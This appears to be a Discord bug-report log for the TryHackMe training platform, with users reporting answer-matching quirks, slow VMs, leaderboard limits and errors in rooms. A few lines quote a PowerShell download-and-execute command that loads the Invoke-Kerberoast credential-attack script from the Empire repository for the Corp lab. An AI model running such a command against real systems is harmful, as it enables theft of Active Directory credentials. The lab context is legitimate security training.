@sly raft fun fact, leading zeroes in an IP address octet leads to undefined behaviour. Windows treats it as Octal and things go very wrong.
I mean undefined behaviour also means it could go right ;)
Hi, I have some weird behavior with day 4 challenge. I can see the questions while logged out, but can't see them anymore once logged in. I have tried to disable adblocker, change my browser, I even tried with another computer, but still the exact same problem :/
@haughty sand try to leave the room and re-join
@slender pagoda it worked, thanks!
Can I get an admin or someone who has access to check how the "answer" function works on the site, @celest summit found an interesting bug
It appears, at least on one question in todays room, but perhaps all questions, if you submit the right answer, the answer will accept even if anything incorrect is following the right answer in the answer box. Example: if 1.1.1.1 is the answer, you can submit 1.1.1.1.5.3.5.1.2 and the answer will submit successfully.
This is true of at least 9-4 in the advent room
AFAIK the answers all (or most) have some regex for matching, and especially that one might be because they "fixed" the answer as there was some weird results showing up
There's a fair amount of regex involved in the answer submission, hence why the answers can be overly forgiving at times
We use a similarity metric to check answers so the text you enter must be 80% similar to the answer
And I think this is done by comparing characters
^ Yeah, its not quite perfected though as you can see.
@frosty cape on the 'Teams' leaderboard page, captain is spelt wrong.
For the room kenobi, the mount command no longer works
Hello task 9 has no questions and it indicates that I have completed it. How can I fix it? (cyber advent)
Leave and rejoin the room
Answer to Alfred q1 is wrong
Nmap with all ports shows 1 more than the answer stated
Investigating Windows is unbearably slow, probably needs more resources as it's a gui
Definitely needs more RAM
Things like event viewer take a long time to load which makes completing any tasks a real chore
Also the answer that was there for Hackback (2?) on that room doesn't work. Room is the same and the logs are the same
Answer format was wrong
Also yeah, too little ram to even open notepad in under a minute
Hm, I've noticed the boot time on the VMs have gotten worse since December
After a spur of machine deploys
I will investigate
@spiral flame The answers are not the same, it's a different VM
Was just simulated the same
Ah must have attached the same questions
Also
In terms of the boot times on AWS
I need to request higher resource rate
So hopefully it will improve soonish
Yeah we're being limited - I have requested our quota to be increased.
Confirmed bug, I have the same issue with 12 pages. I think it rounds to the next multiple of 6.
i guess its a counting problem related to filter buttons
when you filter it shows less available pages
but not fixing the scroll
Even without filtering, I get the extra pages
@frosty cape just a suggestion for better UI remove them from the scroll better than disable them, it is confusing control
@rugged ermine is the bot meant to say welcome "special_quote" or is it meant to be replaced with an actual quote when someone joins?
That's a rare event, it'll typically do a normal quote. Likely that cog is malfunctioning
Ah ok, I knew they were rare but wasn't sure if special_quote was just a variable that hadn't updated
The quote thing has no issue, we just can't figure out why is there so many invalid-user
But yeah no special_quote is intended
special_quote is all we could come up with for a special quote
"bLuE iS nOt BrOkEn. -DarkStar, probably."
And this
I added another one but apparently it got stashed, I'll readd
Christmas challenge for today, Q2 has quite a few OSs with the same confidence level
And the highest confidence level one isn't correct (or at least for me)
Yes, port scanning over the internet isn't very reliable
I get different numbers of ports, or incredibly slow (read: hours) for a scan
There's a mistake in the official room Corp
Flag needs a space, but flag in the file doesn't have one
Also, the command is wrong because it specifies the name of an AD forest that doesn't exist
You need to change the name of the forest, AND also respace the command it gives you
it doesn't tell you enough about the box to enumerate it correctly, especially since this is a walkthrough
iex(New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') is also broken
iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')
iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') is the correct
Also password has expired so you have to manually type out a ludicrously long password and reset it
I expected more from an official room.
@spiral flame yeah, I pinged @frosty cape a few times within the past week on the Corp room on those issues and didn't hear back
i also use the Feedback link on the site for a lot of stuff like that but never hear back if any of it gets fixed. So no clue if it's doing any good to report
Hi @tidal kiln what's your username? I don't recall getting anything from you :(
I always try to answer all feedback or put the bugs on my to do list
Also @spiral flame hmm, I'll look into this - we had that rooms VM built by a community member. So will ask them to fix the password issue and I'll have the VM reuploaded.
weird thing i finished this room and i dont see my self listed here
Assuming you've done a hard refresh of the page?
same, i joined like 6 rooms and my name not showing in any
Hmm weird, what's your THM username and what room(s) is this an issue in?
sec
I think you'll only show in the leaderboard/chart if you're in the top 50 ranking for the room as well
Yeah, it's probably a case of not being in the top 50 - If I can remember/find the api request to pull the full leaderboard I'll check to confirm
lol
dont you think ?
50 seems reasonable to me
Even with 50 the chart is messy, dread to think what it would look like with double the number of results lol
If you're that low you probably will end up in the grey mess anyways
Yeah, the chart is limited to 50 users so @deft jackal you wont see yourself sorry
I was thinking of changing the line graph to a bar chart
So you see users scores more accurately.
Alternatively maybe there could be an api call where a user's own score will always appear on the room leader board with the rank for the room
Room Ice Task 4 # 10 doesn't seem to display any more options after setting the session.
Only after running the exploit command did a payload (windows/meterpreter/reverse_tcp) automatically select itself and more options showed up
Weird I swear it worked when I was doing it the other day
ditto, just did the same room and can confirm exact same finding as @fervent gust
@tropic ore dm me if you need any help
Not really a bug but I believe there is a typo in #rules
"strictly prohibited, just don't turn it into advertising."
Is anyone else having trouble after connecting to FTP on task 16 of the christmas event? I can login just fine and execute the help command. When I try to list the directory using dir or ls however the server disconnects
switching to passive mode made no difference
When I enable debug mode it seems like something is not set up correctly:
ftp: setsockopt (ignored): Permission denied
---> PORT 10,8,13,251,189,243
@frosty cape You mentioned that this past sunday you were going to remove the feature regarding "Also is there any way to leave a room that is for members only? If I click the room, it just immediately takes me to /why-subscribe". Just wanted to check in since it still won't allow me to leave a room that requires a subscription. The room in this case was Game Zone; Code: gamezone
It seems that the progress section is bugged on the paths. I'm currently doing primer and the values are different
versus this
Ooooooo ok
That is really really weird
I've put this high on my to-do list
@ocean reef I will remove this in the next push - advent of cyber has been keeping me from regularly building and pushing code.
@frosty cape okay, thank you for looking into it!
quite interesting to be fair! also, there's this section of the wiki that could be integrated in the paths https://tryhackme.com/goals
rather than having that info in 2 places as it is closely related, and probably leave the paths free to access but point out which rooms you require subscription for
I couldn't bring myself to get rid of the goals page
Because I like how you can get a good overview of all rooms
Jeesssuus, that goals page needs updating
We have so many new rooms added since then
i understand that, but i think it can be integrated as part of the learning paths
Wouldn't it be repeated though?
like it is now but in brackets (subscribers only)
well you will have the room, the description and the outcome
because the rooms are laid out in the pathways
so you won't require the goals page
it's up to you, i just find it a little bit redundant, you could do the tick on normal paths too probably?
Yeah thats true
like let's say you got the path> expand> you get rooms>expand> you get the outcomes
and that to be accessible to everyone but the premium rooms to be pointed out
i don't know if it makes sense to you what I'm saying
No worries @frosty cape and thanks for all the hard work. Loving the advent calendar and finally getting into some additional rooms of THM
how
yes
i sent it there
it would have been better if we could do it for ourselves
how long will it take for my email to be corrected
??
@vocal raptor
@trim relic I will do it now if you email
i already did
Out of interest, why do you need it asap?
can you please check
i would like to get verified and like to explore and learn
lets see if i can subscribe as well
@trim relic I wouldn't post your contact details on a public discord like this π
Your email has been updated
@mortal root Yeah good shout
@rare swallow Path bug has been fixed, can you please please verify?
@frosty cape On the goals page, basicpentesting has been made private
@frosty cape confirmed. Works fine!
Amazing, what % is it showing out of interest
57
On both
Wait a moment
@frosty cape that's not right. I got 3 boxes left on this path
How did it drop from 73 to 57
So it does it depending on how many tasks are left
Do the last 3 boxes on the path have many tasks?
Let me look into it again
I can't check right now, sorry. It's the blue primer part and ice
OKay I will check again
Ah actually dude yeah then its accurate
Blue primer is a large part
@rugged ermine
That must have glitched on an edit, gimme just a sec
@rare swallow thanks much for the heads up on that
Check it now, I fixed it
Looks like another question got squished into it a bit
Splunk is a very powerful tool but the learning curve is immense
@rugged ermine more of a suggestion for this:
you should either word it a little bit better or give a hint out that it's similar to a function in excel
took me ages to understand what it's asked
from the context it points out to 'rename'
Hi! Wrong channel btw hop on to #521382216304033794 or maybe #thm-community-media
I assume this is your work @frosty cape ? Room - learnburp
Think so?
has some slight grammar mistakes
well text, my bad
and deploy on both task 2 and 3, even though it's the same machine?
Thanks for reporting, I removed deploy from both tasks
And removed that also
Will read the room fully tonight and update accordingly.
thank you :), also, is there any chance we can get an updated version of it
i mean a more thorough room that covers a little bit more of the functionality of burp suite. as i am just learning about it now it seems pretty basic. I think a room that covers on how to use it and perform certain tasks to capture some flags will be more beneficial for the users
Yeah, I really need to add more tasks.
I want to focus on the content development, we have the community creating rooms which is amazing.
But soon I will shift my focus on seeking out great content developers to help us.
okay, that makes sense. Then, you should shift the ownership of the rooms to someone else in this process. or are you going to add sections on the rooms like: createdby - ; updated by - maintained by- ?
❤️
Lmao. I actually wouldn't mind I don't like the green name ¯\_(ツ)_/¯
@glass kindle Ah, this is weird

